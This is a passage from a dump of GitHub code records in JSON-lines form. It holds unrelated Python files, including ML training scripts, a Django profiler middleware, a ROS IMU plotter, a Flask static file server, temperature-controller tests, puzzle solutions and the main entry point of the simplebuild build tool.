'qa17_positional-reasoning',\n 'qa18_size-reasoning', 'qa19_path-finding', 'qa20_agents-motivations'\n ]\n suffix = '_{}.txt'\n with open('result.file', 'w') as result:\n for prefix in prefixs:\n for task in tasks:\n challenge = 'tasks_1-20_v1-2/' + prefix + '/' + task + suffix\n max_test_acc = train_and_test(challenge)\n result.write(prefix + '\\t' + task + '\\t' + str(max_test_acc) + '\\n')\n result.flush()\n result.close\n\n\nif __name__ == \"__main__\":\n train_process()\n","repo_name":"ByzenMa/deepnlp-models","sub_path":"bAbi/n-gram/train_and_test.py","file_name":"train_and_test.py","file_ext":"py","file_size_in_byte":5405,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"16939229368","text":"import webapp2\nimport json\nimport datetime\nfrom model import ModelRange\nLIMIT_ALL = 20000\n\nclass Range(webapp2.RequestHandler):\n def year(self, year):\n if year == 0:\n return datetime.date.today().year\n return year\n\n def prettyprint_years(self, start, stop):\n if stop == 0:\n return '%d-' % (start)\n return '%d-%d' % (start, stop)\n\n def get(self):\n ranges = ModelRange.all().fetch(500)\n # Some trickery to sort the ranges properly\n ranges = sorted(ranges, key=lambda range: -self.year(range.year_end))\n ret = []\n for modelrange in ranges:\n # Skip the generic one\n if modelrange.name != 'Alfa Romeo' and modelrange.name != 'Ukjent':\n ret.append({\n 'key': str(modelrange.key()),\n 'name': modelrange.name,\n 'years': self.prettyprint_years(modelrange.year_start, modelrange.year_end)})\n\n self.response.content_type = 'application/json'\n self.response.write(json.dumps(ret))\n\n\nclass Model(webapp2.RequestHandler):\n def year(self, year):\n if year == 0:\n return datetime.date.today().year\n return year\n\n def prettyprint_years(self, start, stop):\n if stop == 0:\n return '%d-' % (start)\n return '%d-%d' % (start, stop)\n\n def get(self, range_id):\n modelrange = ModelRange.get(range_id)\n ret = []\n if modelrange:\n models = modelrange.models.fetch(500)\n models = sorted(models, key=lambda model: -self.year(model.year_to))\n for model in models:\n ret.append({\n 'key': str(model.key()),\n 'name': model.name,\n 'tipo': model.typeno,\n 'motore': model.engine_code,\n 'years': self.prettyprint_years(model.year_from, model.year_to)\n })\n\n self.response.content_type = 'application/json'\n self.response.write(json.dumps(ret))\n","repo_name":"KlubbAlfaRomeoNorge/members","sub_path":"ajax/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38260575558","text":"import sys\nimport os\nimport re\nfrom collections import defaultdict\n\nimport cProfile\nimport pstats\nimport simplejson\n\nfrom cStringIO import StringIO\n\nfrom django.conf import settings\n\nfrom django.template.loader import get_template\nfrom django.template import Context\nfrom django.http import HttpResponse\n\nwords_re = re.compile( r'\\s+' )\n\ngroup_prefix_re = [\n re.compile( \"^.*/django/[^/]+\" ),\n re.compile( \"^(.*)/[^/]+$\" ), # extract module path\n re.compile( \".*\" ), # catch strange entries\n]\n\nsite_package_re = re.compile(\"^.*/site-packages/(?P[a-zA-Z_]\\w*)?\")\nstdlib_re = re.compile(\"^.*/lib/python.*/(?P[a-zA-Z_]\\w*)?\")\ncore_re = re.compile(\".*(\\{.*\\})\")\n\nclass ProfileMiddleware(object):\n def process_view(self, request, callback, callback_args, callback_kwargs):\n if settings.DEBUG and 'prof' in request.GET:\n self.profiler = cProfile.Profile()\n args = (request,) + callback_args\n return self.profiler.runcall(callback, *args, **callback_kwargs)\n\n def get_group(self, file):\n for g in group_prefix_re:\n name = g.findall( file )\n if name:\n return name[0]\n\n def get_summary(self, results_dict, sum):\n lst = [ (item[1], item[0]) for item in results_dict.items() ]\n lst.sort( reverse = True )\n lst = lst[:40]\n\n dct = {}\n for item in lst:\n dct[item[1]] = 100*item[0]/sum if sum else 0\n\n return dct\n\n def summary_for_files(self, stats_str):\n stats_str = stats_str.split(\"\\n\")[5:]\n\n mystats = {}\n mygroups = {}\n mymodules = {}\n myclasses = {\n 'business' : 0,\n 'stdlib' : 0,\n 'cpython' : 0,\n 'django' : 0,\n 'sql' : 0,\n 'diskio' : 0\n }\n\n mybusiness = defaultdict(int)\n mystdlib = defaultdict(int)\n mycpython = defaultdict(int)\n mydjango = defaultdict(int)\n mysql = defaultdict(int)\n mydiskio = defaultdict(int)\n\n sum = 0\n\n for s in stats_str:\n fields = words_re.split(s);\n corecall = core_re.match(s)\n\n # Example:\n # 3 0.004 0.001 0.004 0.001\n # {method # 'execute' of 'psycop g2._psycopg.cursor' objects}\n if corecall:\n callname = corecall.groups(0)[0]\n\n time = float(fields[2])\n mycpython[callname] += time\n\n if \"\"\"of 'file' objects\"\"\" in callname:\n myclasses['diskio'] += time\n mydiskio[callname] += time\n\n # TODO: support for mysql and sqlite\n elif \"\"\"of 'psycopg2._psycopg.cursor'\"\"\" in callname:\n myclasses['sql'] += time\n mysql[callname] += time\n else:\n myclasses['cpython'] += time\n\n # Example:\n # 166 0.001 0.000 0.002 0.000 # /home/.virtualenvs/s/li\n # /python2.7/site-packages/django/utils/functional.py:254(wrapper)\n elif len(fields) == 7:\n\n try:\n time = float(fields[2])\n except:\n # A header line\n continue\n\n sum += time\n\n try:\n filename, lineno = fields[6].split(\":\")\n except ValueError:\n filename = fields[6]\n\n # Files\n if not filename in mystats:\n mystats[filename] = 0\n mystats[filename] += time\n\n\n if 'django' in filename:\n mydjango[filename] += time\n\n # Groups\n group = self.get_group(filename)\n if not group in mygroups:\n mygroups[ group ] = 0\n mygroups[ group ] += time\n\n # Modules\n site_package = site_package_re.match(filename)\n stdlib_package = stdlib_re.match(filename)\n core_call = core_re.match(filename)\n\n # a site-package\n if site_package:\n module = site_package.groupdict().get('module', None)\n\n # Some core Django module\n if module == 'django':\n myclasses['django'] += time\n\n # standard library\n elif stdlib_package:\n module = stdlib_package.groupdict().get('module', None)\n myclasses['stdlib'] += time\n mystdlib[module] += time\n\n # business logic\n else:\n module = filename\n myclasses['business'] += time\n mybusiness[module] += time\n\n\n if not module in mymodules:\n mymodules[ module ] = 0\n\n mymodules[ module ] += time\n\n profiles = {\n 'byfile' : self.get_summary(mystats, sum),\n 'bygroup' : self.get_summary(mygroups, sum),\n 'bypackage' : self.get_summary(mymodules, sum),\n 'byclass' : self.get_summary(myclasses, sum),\n\n 'business' : self.get_summary(mybusiness , sum),\n 'stdlib' : self.get_summary(mystdlib , sum),\n 'cython' : self.get_summary(mycpython, sum),\n 'django' : self.get_summary(mydjango, sum),\n 'sql' : self.get_summary(mysql, sum),\n 'diskio' : self.get_summary(mydiskio, sum),\n }\n\n return profiles\n\n def process_response(self, request, response):\n if (settings.DEBUG or request.user.is_superuser) and request.REQUEST.has_key('prof'):\n\n self.profiler.create_stats()\n out = StringIO()\n stats = pstats.Stats(self.profiler, stream=out)\n\n stats.sort_stats('time').print_stats(.2)\n response.content = out.getvalue()\n\n stats_str = out.getvalue()\n\n # The profiler dump\n raw_dump = \"\\n\".join(stats_str.split(\"\\n\")[:40])\n\n # Our profiler dump\n profiles = self.summary_for_files(stats_str)\n\n t = get_template('django_sense/profile.html')\n html = t.render(Context({\n 'raw_dump': raw_dump,\n 'raw_json': simplejson.dumps(profiles, indent=4),\n 'profiles': profiles,\n }))\n return HttpResponse(html)\n else:\n return response\n","repo_name":"MechanisM/django-sense","sub_path":"django_sense/middleware/profiler.py","file_name":"profiler.py","file_ext":"py","file_size_in_byte":6568,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"37762484217","text":"#!/usr/bin/env python\nimport rospy\nimport tf\nfrom tf import *\nimport sys, struct, time,threading\n# Messages\nfrom std_msgs.msg import String\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import Point, Quaternion, Vector3\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Imu\nfrom nav_msgs.msg import Odometry\nimport matplotlib.pyplot as plt\n\n# usage: rosrun kloam imu.py\nsaveFolder = \"/home/binpeng/Documents/KLOAM/imu_test/\"\npubIMU = rospy.Publisher(\"/imuF\", Imu, queue_size = 100)\nxAcc = []\nyAcc = []\nzAcc = []\nxAV = []\nAVbuf = Vector3()\ninitFinish = False\nalpha = 0.1\n\ndef imu_callback(msg):\n\txAcc.append(msg.linear_acceleration.x)\n\tyAcc.append(msg.linear_acceleration.y)\n\tzAcc.append(msg.linear_acceleration.z)\n\txAV.append(msg.angular_velocity.x)\n\ndef imu_filter_callback(msg):\n\tif initFinish:\n\t\timuOut = msg\n\t\tAV = Vector3()\n\t\tAV.x = alpha*msg.linear_acceleration.x + (1-alpha)*AVbuf.x\n\t\tAV.y = alpha*msg.linear_acceleration.y + (1-alpha)*AVbuf.y\n\t\tAV.z = alpha*msg.linear_acceleration.z + (1-alpha)*AVbuf.z\n\t\timuOut.linear_acceleration = AV\n\t\t# imuOut.angular_velocity = msg.angular_velocity\n\t\t# imuOut.orientation = msg.orientation\n\t\tpubIMU.publish(imuOut)\n\telse:\n\t\tinitFinish = True\n\tAVbuf = msg.linear_acceleration\n\t\t\n\t\t\n\n\ndef odomListener():\n\trospy.init_node('acc_plot_node', anonymous = True)\n\trospy.loginfo(\"IMU plotting node initialized!\")\n\tsubIMUfilter = rospy.Subscriber(\"/imu\", Imu, imu_filter_callback)\n\tsubIMUplot = rospy.Subscriber(\"/imuF\", Imu, imu_callback)\n\trospy.spin()\ndef plot(folder):\n\trospy.loginfo(\"Start plotting imu\")\n\tplt.title('IMU')\n\tplt.subplot(1,2,1)\n\tplt.plot(xAcc,color='green', label='acc x')\n\tplt.xlabel('Acc x')\n\tplt.subplot(1,2,2)\n\tplt.plot(xAV,color='red', label='angular vel x')\n\tplt.xlabel('Angular velocity x')\n\tplt.legend()\n\t# plt.savefig(folder+\"imu.jpg\")\n\tplt.show()\n\trospy.loginfo(\"Done plotting and saving\")\n# def save(folder):\n# \twith open(folder+\"odomW.txt\",'w') as f1:\n# \t\tfor i in range(len(xWheel)):\n# \t\t\tf1.write(\"%8.3f %8.3f \\n\"%(xWheel[i],yWheel[i]))\n# \twith open(folder+\"odomL.txt\",'w') as f2:\n# \t\tfor i in range(len(xSLAM)):\n# \t\t\tf2.write(\"%8.3f %8.3f \\n\"%(xSLAM[i],ySLAM[i]))\n# \trospy.loginfo(\"Done saving odometry as txts\")\nif __name__ == '__main__':\n\t# try: \n\t# \todomListener()\n\t# except rospy.ROSInterruptException: // this won't catch the \"ctrl+C\"\n\t# \tprint(\"wtf\")\n\t# \tplot()\n\todomListener()\n\tif rospy.is_shutdown():\n\t\tplot(saveFolder)\n\t\t# save(saveFolder)\n\n\n\n \n\n","repo_name":"HaisenbergPeng/ROLL","sub_path":"scripts/MISC/imuPlotUnref_TODO.py","file_name":"imuPlotUnref_TODO.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"32"} +{"seq_id":"37847829851","text":"from util import *\nfrom d2l import torch as d2l\n\nbatch_size, num_steps = 32, 35\ntrain_iter, vocab = d2l.load_data_time_machine(batch_size, num_steps)\n\nif __name__ == '__main__':\n device = d2l.try_gpu()\n num_hiddens = 256\n num_epochs = 3000\n lr = 0.5\n rnn_layer = nn.RNN(len(vocab), num_hiddens)\n net = RNNModel(rnn_layer, len(vocab))\n net = net.to(device)\n train(net, train_iter, vocab, lr, num_epochs, device)","repo_name":"xiaoqieF/DL-notes","sub_path":"chapter-recurrent-neural-networks/rnn-concise.py","file_name":"rnn-concise.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35952967045","text":"# Uses python3\n\nclass mpp:\n def maxPairwiseProduct(self, len, arr):\n result = 0\n\n for i in range(0, len):\n for j in range(i + 1, len):\n if arr[i] * arr[j] > result:\n result = arr[i] * arr[j]\n return result\n\n\ndef main():\n n = int(input())\n a = [int(x) for x in input().split()]\n assert (len(a) == n)\n\n print(mpp().maxPairwiseProduct(n, a))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"seanfeehan/algorithmictoolbox","sub_path":"ass2MaxPairwiseProduct/mpp.py","file_name":"mpp.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4353816707","text":"#!/usr/bin/python3\n\nimport os\nimport sys\nimport flask\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\napp = flask.Flask(__name__)\napp.logger.setLevel(logging.INFO)\n\nlogger = logging.getLogger('application')\nlogger.debug(app.url_map)\nlogger.debug(os.environ)\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\ndef configure_server(public_path):\n\t@app.errorhandler(Exception)\n\tdef handle_error(error):\n\t\t# handle server faults (i.e. \"non http\" exceptions that get raised.\n\t\tresponse = flask.make_response(\"Sorry, an error occured\", 500)\n\n\t\timport traceback\n\t\ttype_, value_, traceback_ = sys.exc_info()\n\t\ttrace = traceback.format_tb(traceback_)\n\n\t\timport pprint\n\t\tmessage = \"\"\n\t\tmessage += \"*Stack Trace* \\n```%s, %s:\\n%s```\\n\" % (type(error), error.message, \"\".join(trace))\n\n\t\treturn flask.make_response(\"Uh Oh!\", 500)\n\n\t@app.errorhandler(404)\n\tdef default(*args, **kwargs):\n\t\tpage = flask.request.path[1:]\n\n\t\ttry:\n\t\t\tcontents = open(os.path.join(public_path,page)).read()\n\t\texcept IOError as e:\n\t\t\tlogger.info(\"couldn't access %s on the file system, will try index.html instead\", os.path.join(public_path,page))\n\t\t\ttry:\n\t\t\t\tpage = \"index.html\"\n\t\t\t\tcontents = open(os.path.join(public_path,page)).read()\n\t\t\texcept FileNotFoundError as e:\n\t\t\t\tlogger.error(\"couldn't find index.html\")\n\t\t\t\treturn flask.make_response(\"I couldn't find the file you asked for, and couldn't find index.html!\", 404)\n\n\t\timport mimetypes\n\t\tmime, _ = mimetypes.guess_type(page)\n\n\t\tif not mime:\n\t\t\tmime = \"text/html\"\n \n\t\tresponse = flask.make_response(contents, 200)\n\t\tresponse.headers['Content-type'] = mime\n\t\treturn response\n\n\t# log each request -- sadly we do it this way so that we are stil inside the request / response context.... otherwise we can't get the session data :-/\n\taccess_logger = logging.getLogger('access')\n\taccess_logger.setLevel(logging.INFO)\n\t@app.after_request\n\tdef log_request(response):\n\t\taccess_logger.info(\"\\t\".join([flask.request.environ.get('REMOTE_ADDR', \"no_ip\"), flask.session.get('user',{}).get('email', '???'), flask.request.method, flask.request.url, str(response.status_code), str(response.content_length)]))\n\n\t\t# Defeat IE's caching of XMLRPC calls\n\t\tresponse.headers['Cache-Control'] = 'no-cache'\n\t\tresponse.headers['Expires'] = '-1'\n\t\tresponse.headers['Pragma'] = 'no-cache'\n\n\t\treturn response\n\ndef run_server():\n\ttry:\n\t\timport pyqrcode, socket\n\t\t# via https://stackoverflow.com/questions/166506/finding-local-ip-addresses-using-pythons-stdlib\n\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tip = \"127.0.0.1\"\n\t\ttry:\n\t\t\t# doesn't even have to be reachable\n\t\t\ts.connect(('10.255.255.255', 1))\n\t\t\tip = s.getsockname()[0]\n\t\tfinally:\n\t\t\ts.close()\n\n\t\turl = 'http://'+ip+\":5000\"\n\t\tqr = pyqrcode.create(url)\n\t\tprint(qr.terminal(quiet_zone=1))\n\t\tlogger.info(\"external address: \"+ url)\n\texcept Exception as e:\n\t\tlogger.info(\"qrcode not installed, not showing QR\", e)\n\n\tapp.run(host=app.config.get('LISTEN_HOST', '0.0.0.0'), threaded=True)\n\nif __name__ == '__main__':\n\tpath = './'\n\tif len(sys.argv) > 1:\n\t\tpath = sys.argv[1]\n\tconfigure_server(path)\n\trun_server()\n","repo_name":"ihle/misc","sub_path":"serve-react.py","file_name":"serve-react.py","file_ext":"py","file_size_in_byte":3136,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7493627837","text":"from .mock_sensor import MockSensor\nfrom app.temperature_controller.heaters import MockHeater\nfrom .mock_cooler import MockCooler\nfrom app.temperature_controller.temperature_controller import TemperatureController, ControllerMode, TemperatureState, ControllerState\n\n\ndef test_temperature_controller():\n\n sensor = MockSensor([60.0, 60.0, 60.0])\n mock_heater = MockHeater()\n\n temp_controller = TemperatureController(\n sensor, mode=ControllerMode.HEATER, heater=mock_heater)\n\n\n\ndef test_compare_temperature():\n sensor = MockSensor([50.0, 59.1, 60.1, 61.0])\n mock_heater = MockHeater()\n\n temp_controller = TemperatureController(\n sensor, mode=ControllerMode.HEATER, heater=mock_heater)\n\n temp_controller.update_set_temp(60)\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.UNDER_TEMP\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.IN_RANGE_UNDER\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.IN_RANGE_OVER\n\n temp_state = temp_controller.compare_temperature()\n assert temp_state == TemperatureState.OVER_TEMP\n\n\ndef test_tick():\n heater_sensor = MockSensor([50.0, 59.9, 60.0, 60.1])\n mock_heater = MockHeater()\n\n heater_temp_controller = TemperatureController(\n heater_sensor, mode=ControllerMode.HEATER, heater=mock_heater)\n\n heater_temp_controller.update_set_temp(60.0)\n\n heater_cases = [\n {\"current_temperature\": 50.0, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.HEATER_ON},\n {\"current_temperature\": 59.9, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.HEATER_ON},\n {\"current_temperature\": 60.0, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF},\n {\"current_temperature\": 60.1, \"mode\": ControllerMode.HEATER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF}\n ]\n\n for case in heater_cases:\n current_state = heater_temp_controller.tick()\n assert_cases(case, current_state)\n\n cooler_sensor = MockSensor([70.0, 60.1, 59.9, 59.0])\n mock_cooler = MockCooler()\n cooler_temp_controller = TemperatureController(\n cooler_sensor, mode=ControllerMode.COOLER, cooler=mock_cooler)\n\n cooler_temp_controller.update_set_temp(60.0)\n\n cooler_cases = [\n {\"current_temperature\": 70.0, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.COOLER_ON},\n {\"current_temperature\": 60.1, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.COOLER_ON},\n {\"current_temperature\": 59.9, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF},\n {\"current_temperature\": 59.0, \"mode\": ControllerMode.COOLER,\n \"set_temperature\": 60.0, \"state\": ControllerState.ALL_OFF}\n ]\n\n for case in cooler_cases:\n current_state = cooler_temp_controller.tick()\n assert_cases(case, current_state)\n\n\ndef assert_cases(case, current_state):\n assert current_state is not None\n assert current_state.get(\"current_temperature\") is not None\n assert case.get(\"current_temperature\") == current_state.get(\n \"current_temperature\")\n assert case.get(\"mode\") == current_state.get(\"mode\")\n assert case.get(\"set_temperature\") == current_state.get(\"set_temperature\")\n assert case.get(\"state\") == current_state.get(\"state\")\n","repo_name":"fellbythecoop/home-brewery","sub_path":"brewhouse-manager/tests/temperature_controller/test_temperature_controller.py","file_name":"test_temperature_controller.py","file_ext":"py","file_size_in_byte":3617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12924320980","text":"import helpers as h\nimport re\n\ninput = h.readdaylines(22, 2022)\nboard = [line.ljust(150, ' ') for line in input[0:-2]]\ntboard = [list(row) for row in zip(*board)]\npath = input[-1]\n\nsteps = [e if e.isalpha() else int(e) for e in re.findall(r'(\\d+|\\D)', path)]\n\ndef r(dir):\n return (-dir[1], dir[0])\ndef l(dir):\n return (dir[1], -dir[0])\n\ndef walk(path):\n pos = nextlineindex(board, (0, 0), 1)\n print(pos)\n dir = (1, 0)\n for c in path:\n if isinstance(c, int):\n for _ in range(c):\n pos = next(pos, dir)\n print(dir, pos)\n else:\n if c == 'R':\n dir = r(dir)\n else:\n dir = l(dir)\n return score(pos, dir)\n\ndef next(pos: (int, int), dir: (int, int)):\n \"\"\"\n Returns the next position given the current position and direction\n \"\"\"\n # branch on direction\n if dir == (1, 0) or dir == (-1, 0): # horizontal\n return nextlineindex(board, pos, dir[0])\n elif dir == (0, 1) or dir == (0, -1): # vertical\n (x, y) = nextlineindex(tboard, (pos[1], pos[0]), dir[1])\n return (y, x)\n\n\ndef nextlineindex(board, pos: (int, int), dir: -1 | 1):\n line = board[pos[1]]\n curx = pos[0]\n mod = len(line)\n # search for next '.' reset when '#' is found\n while True: \n i = (curx + dir) % mod\n next = line[i]\n if (next == '.'):\n curx = i\n break\n elif (next == '#'):\n curx = pos[0]\n break\n elif (next == ' '):\n curx = i \n \n\n return (curx, pos[1])\n\ndef score(pos, dir):\n return 4 * (pos[0] + 1) + 1000 * (pos[1] + 1) + facingscore(dir)\n\ndef facingscore(dir):\n if dir == (1, 0):\n return 0\n elif dir == (0, 1):\n return 1\n elif dir == (-1, 0):\n return 2\n elif dir == (0, -1):\n return 3","repo_name":"teichholz/aoc","sub_path":"aoc-py/2022/day22.py","file_name":"day22.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37117462568","text":"import pygame as pg\nimport library as lib\n\nif __name__ == '__main__':\n pg.init()\n run = True\n point = []\n window = lib.new_window(\"Rotting point\")\n while run:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n run = False\n if event.type == pg.MOUSEBUTTONDOWN:\n point = pg.mouse.get_pos()\n lib.point(window, point)\n if event.type == pg.KEYDOWN:\n if event.key == pg.K_UP:\n point = lib.counterclockwise(point, 5)\n lib.point(window, point, lib.cts.GREEN)\n if event.key == pg.K_DOWN:\n point = lib.clockwise(point, 5)\n lib.point(window, point, lib.cts.BLUE)\n lib.flip()\n pg.quit()\n","repo_name":"AndresMpa/graphic_computing","sub_path":"clase_4_1.py","file_name":"clase_4_1.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6857165770","text":"# Build script which is intended to make the following steps smooth, painless\n# and efficient for users:\n#\n# 1) Detect environment with cmake\n# 2) Configuration step\n# 3) Build step\n# 4) Install step\n# 5) Test launch.\n#\n# Most importantly, it is intended that minimal cpu time is used to needless\n# redo work in steps 1-4 above when user changes code or configuration.\n\ndef simplebuild_main( argv = None, prevent_env_setup_msg = False ):\n\n from . import error\n error.fmt_simplebuild_warnings()#as early as possible\n from . import io as _io\n print = _io.print\n import sys\n import os\n import pathlib\n\n if argv is None:\n argv = sys.argv[:]\n\n progname = os.path.basename( argv[0] )\n\n from .parse_args import parse_args\n parser, opt = parse_args( argv = argv,\n return_parser = True )\n\n if opt.show_version:\n from . import _determine_version\n sys.stdout.write(_determine_version.determine_version()+'\\n')\n raise SystemExit\n\n if opt.quiet:\n _io.make_quiet()\n if opt.verbose:\n _io.make_verbose()\n\n if opt.env_setup:\n #should actually have been done in _cli.py already\n _io.make_quiet()\n from .envsetup import emit_envsetup\n emit_envsetup()\n raise SystemExit\n\n if opt.env_unsetup:\n #should actually have been done in _cli.py already\n _io.make_quiet()\n from .envsetup import emit_env_unsetup\n emit_env_unsetup()\n raise SystemExit\n\n if opt.summary:\n print(\"FIXME: summary mode is not yet implemented!\")\n raise SystemExit\n\n if opt.init is not None:\n from . import init_project\n init_project.init_project( depbundles = opt.init )\n raise SystemExit\n\n #setup lockfile:\n from . import dirs\n\n if not dirs.blddir.exists() and not dirs.installdir.exists():\n #Silently set this in case of completely fresh build, to avoid getting\n #some slightly confusing printouts later:\n opt.insist = True\n\n if opt.removelock and dirs.lockfile.exists():\n os.remove(dirs.lockfile)\n\n lockfile_content = str(os.getpid())\n if dirs.lockfile.exists():\n locking_pid = dirs.lockfile.read_text()\n error.error('Presence of lock file indicates competing invocation of '\n f'{progname} (by pid {locking_pid}). Force removal'\n f' with {progname} --removelock if you are sure this is incorrect.')\n dirs.create_bld_dir()\n dirs.lockfile.write_text(lockfile_content)\n\n assert dirs.lockfile.read_text()==lockfile_content\n\n def unlock():\n expected_content = lockfile_content\n if ( dirs.lockfile.exists()\n and dirs.lockfile.read_text()==expected_content ):\n dirs.lockfile.unlink()\n import atexit\n atexit.register(unlock)\n\n from . import conf\n from . import envcfg\n\n if opt.clean:\n if dirs.blddir.is_dir() or dirs.installdir.is_dir():\n if not opt.quiet:\n print(\"Removing temporary cache directories.\")\n conf.safe_remove_install_and_build_dir()\n #Let us perhaps also try and remove the cachedir, i.e. the parent\n #dir of install and build. We want to remove it to not litter an\n #empty \"simplebuild_cache\" in peoples bundle dirs, but we also do\n #not want to remove a directory which a user might have created\n #manually for their cache (even if empty, since it might still be\n #confusing). As a compromise, we remove it only if it is in the\n #default location with the default name (users messing with pkg_root\n #or cachedir are anyway expected to be more advanced):\n dcache = envcfg.var.build_dir_resolved.parent\n assert dcache == envcfg.var.install_dir_resolved.parent\n if ( dcache == ( envcfg.var.projects_dir / 'simplebuild_cache' )\n and not any( dcache.iterdir() ) ):\n dcache.rmdir()\n else:\n if not opt.quiet:\n print(\"Nothing to clean. Exiting.\")\n raise SystemExit\n\n #Detect changes to system cmake or python files and set opt.examine or opt.insist as appropriate.\n from . import mtime\n from . import utils\n systs = (mtime.mtime_cmake(),mtime.mtime_pymods())\n try:\n oldsysts = utils.pkl_load(dirs.systimestamp_cache)\n except IOError:\n if not opt.insist:\n if dirs.systimestamp_cache.exists():\n print(\"Could not load timestamp cache insist due to IOError loading dirs.systimestamp_cache\")\n opt.insist=True\n oldsysts = (None,None)\n\n if envcfg.var.allow_sys_dev:\n #prevent changes in system from triggering rebuilds (for careful system\n #development use):\n systs = oldsysts\n\n if not opt.insist and oldsysts!=systs:\n if oldsysts[0]!=systs[0]:\n opt.examine = True\n if not opt.insist and oldsysts[1]!=systs[1]:\n print(\"simple-build-system time stamp changed -> performing complete rebuild for safety.\")\n opt.insist = True\n\n if not opt.insist and dirs.envcache.exists():\n envdict=utils.pkl_load(dirs.envcache)\n #insist rebuilding COMPLETELY from scratch if install or build dirs changed:\n _autoreconf_inst_dir = envdict['_autoreconf_environment'].get('install_dir')\n _autoreconf_bld_dir = envdict['_autoreconf_environment'].get('build_dir')\n if _autoreconf_inst_dir != str(conf.install_dir()):\n print(\"Performing complete rebuild since the cache install dir changed (%s -> %s)\"%(_autoreconf_inst_dir,\n str(conf.install_dir())))\n opt.insist = True\n elif _autoreconf_bld_dir != str(conf.build_dir()):\n print(\"Performing complete rebuild since the cache build dir changed (%s -> %s)\"%(_autoreconf_bld_dir,\n str(conf.build_dir())))\n opt.insist = True\n\n if opt.insist:\n conf.safe_remove_install_and_build_dir()\n dirs.create_bld_dir()\n\n utils.pkl_dump(systs,dirs.systimestamp_cache)\n\n select_filter = envcfg.var.pkg_filter\n assert select_filter is not None\n\n from . import backend\n\n err_txt,unclean_exception = None,None\n error.default_error_type = error.Error\n try:\n pkgloader = backend.perform_configuration(select_filter=select_filter,\n force_reconf=opt.examine,\n load_all_pkgs = opt.query_mode,\n quiet=opt.quiet,\n verbose=opt.verbose)\n except KeyboardInterrupt:\n err_txt = \"Halted by user interrupt (CTRL-C)\"\n except error.CleanExit as ce:\n #errors already handled, exit directly:\n sys.exit(ce._the_ec)\n except Exception as e:\n err_txt=str(e)\n if not err_txt:\n err_txt=''\n if not isinstance(e,error.Error):\n unclean_exception = e\n except SystemExit as e:\n if str(e)!=\"knownhandledexception\":\n err_txt = \"Halted by unexpected call to system exit!\"\n unclean_exception = e\n\n error.default_error_type = SystemExit\n\n if err_txt:\n #fixme: unprefixed printouts?:\n print(\"\\n\\nERROR during configuration:\\n\\n %s\\n\\n\"\n \"Aborting.\"%(err_txt.replace('\\n','\\n ')))\n #make all packages need reconfig upon next run:\n from . import db\n db.db['pkg2timestamp']={}\n db.save_to_file()\n #exit (with ugly traceback if unknown type of exception):\n if unclean_exception:\n error.print_traceback(unclean_exception)\n sys.exit(1)\n\n assert dirs.makefiledir.is_dir()\n\n def query_pkgs():\n #returns list of (pkg,filenames) where filenames is None, or a list of\n #the files in the pkg to search (e.g. ['pkg.info','pycpp_bla/mod.cc']\n all_pkgs = list(sorted(pkgloader.pkgs))\n if not opt.querypaths:\n return [(p,None) for p in all_pkgs]\n res=[]\n for p in all_pkgs:\n search_entire_package = False\n filenames=[]\n for qp in opt.querypaths:\n assert isinstance(p.dirname,str)#fixme: to pathlib.Path\n pdir = pathlib.Path(p.dirname)\n if pdir == qp or utils.path_is_relative_to( pdir, qp ):\n search_entire_package = True\n break\n if utils.path_is_relative_to( qp, pdir ):\n filenames.append( qp.relative_to(pdir) )\n if search_entire_package:\n res.append( (p, None) )\n elif filenames:\n res.append( (p, filenames) )\n return res\n\n if opt.grep:\n qp = query_pkgs()\n print(\"Grepping %i packages for pattern \\\"%s\\\"\"%(len(qp),opt.grep))\n print()\n n=0\n from . import grep\n for pkg,filenames in qp:\n n += grep.grep( pkg,\n opt.grep,\n filenames = filenames,\n countonly = opt.grepc )\n print()\n print(\"Found %i matches\"%n)\n raise SystemExit\n\n if opt.replace:\n qp = query_pkgs()\n pattern = opt.replace\n from . import replace\n search_pat, replace_pat = replace.decode_pattern(pattern)\n if not search_pat:\n parser.error(\"Bad syntax in replacement pattern: %s\"%pattern)\n print()\n print(\"Replacing all \\\"%s\\\" with 